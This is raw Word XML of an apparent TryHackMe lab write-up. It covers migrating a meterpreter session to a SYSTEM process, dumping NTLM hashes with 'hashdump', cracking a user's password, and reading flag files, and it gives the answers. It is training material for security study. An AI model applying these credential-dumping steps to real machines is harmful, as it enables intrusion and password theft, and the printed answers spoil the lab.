      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4867275" cy="533400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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867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Rule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q7:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5795963" cy="3532061"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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95963" cy="353206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0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q8: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4791075" cy="771525"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="22"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7910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spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nhcapyf09pex" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mu0s6wv6txpw" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wc03vmz5mmyg" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 4: Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user? </w:t>
      </w:r>
    </w:p>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Jon</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="520700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="12"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Rule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Copy this password hash to a file and research how to crack it. What is the cracked password?</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b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ans:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> alqfna22</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After running the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashdump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command in Meterpreter, I obtained the NTLM password hashes for local user accounts. I copied the relevant NTLM hash into a file for cracking. I then used CrackStation to analyze the hash. The service successfully matched the hash against its database and revealed the plaintext password. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="520700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="30"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Rule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5360096" cy="1881188"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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360096"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before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_oi0np5xavyyv" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 5: Find flags!</w:t>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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flag1? This flag can be found at the system root. </w:t>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flag{access_the_machine}</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigated to the system root directory C:\, listed the files to locate flag1.txt, and then used the cat flag1.txt command to read its contents and obtain the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3810000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4"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before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pP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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flag2? This flag can be found at the location where passwords are stored within Windows.</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flag{sam_database_elevated_access}</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigated to the Windows password storage location C:\Windows\System32\config, listed the files to identify flag2.txt, and then read the file contents to obtain the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2324100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="20"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0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1079500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pP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t xml:space="preserve">Q3: flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved. </w:t>
      </w:r>
    </w:p>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spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ans: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag{admin_documents_can_be_valuable}</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigated to the user directory, accessed the Administrator/Jon profile then checked the Documents folder. After listing the files, flag3.txt was found and read to obtain the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3948113" cy="3422963"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="24"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3948113" cy="34229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Rule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2717800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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sectPr>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="1440"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4.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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5.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.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8.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/furthernmap" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/furthernmap" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/module/metasploit" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId38"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hyperlink" Target="https://tryhackme.com/module/metaspl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